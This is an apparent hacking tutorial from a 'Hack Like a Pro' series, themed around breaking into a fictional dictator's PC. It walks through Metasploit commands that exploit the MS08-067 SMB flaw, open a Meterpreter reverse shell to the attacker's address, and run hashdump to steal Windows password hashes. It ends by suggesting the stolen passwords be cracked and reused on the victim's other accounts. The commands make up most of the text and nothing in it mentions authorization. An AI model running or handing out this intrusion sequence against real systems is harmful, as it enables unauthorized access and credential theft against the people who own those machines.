Hack Like a Pro: How to Remotely Grab Encrypted Passwords from a Compromised Computer
Welcome back, my fledgling hackers!
There's an evil dictator hellbent on destroying the world, and in one of our last hacks, we successfully compromised his computer and saved the world from nuclear annihilation. Then, we covered our tracks so no one would know what we did, and developed a hack to capture screenshots of his computer periodically so we could track of what he was up to next.
With this new hack, we'll capture the passwords from the maniacal dictator's computer so that we can access his PC through his account— or anyone else's account on his computer, including the most important account—the system administrator's.
Windows systems store passwords in encrypted form inside a file called the SAM file. This file resides in the c:\windows\system32\config\sam directory. If we can gain access to his computer, as we've already done, we can grab a copy of the encrypted passwords, transfer them to our computer, and then crack them later at our leisure.
So, let's fire up our trusty framework hacking tool, Metasploit, and let's go grab those passwords!
Once again, let's use a tried and true exploit; type:
- msf > use exploit/windows/smb/ms08_067_netapi
Now, let's set the payload to our all powerful Meterpreter.
- msf (ms08_067_netapi) > set payload /windows/meterpreter/reverse_tcp
It's always a good idea now to check our options.
As you can see, we'll need both the LHOST (the IP address of our computer) and RHOST (the IP address of the victim computer). Let's set these now.
- msf (ms08_067_netapi) > set RHOST 192.168.1.108
- msf (ms08_067_netapi) > set LHOST 192.168.1.109
With everything set, now all that's left to do is exploit!
- msf (ms08_067_netapi) > exploit
We now have a Meterpreter terminal prompt on the maniacal dictator's computer!
As you've seen in my previous tutorials, the Meterpreter has several powerful scripts built in. In this case, we'll be using one called hashdump.
Just a bit of explanation before we grab those passwords...
For security purposes, most operating systems (including all of the modern Windows operating systems) store the user passwords in hashes. This is a one-way encryption that make the passwords unreadable to humans. These are the hashes we're after, hence the script is called hashdump.
So, let's go ahead and grab those hashes!
- meterpreter > hashdump
As you can see, we now have several users and their encrypted password hashes. Of course, right now we can't read them, but come back for my next tutorial and I'll show you how to crack them so that we can use them at our leisure.
Remember, once we have the maniacal dictator's password, it's likely that he uses that same password on systems other than this one (i.e. email, secure areas, etc.), giving us access to many of his secure assets.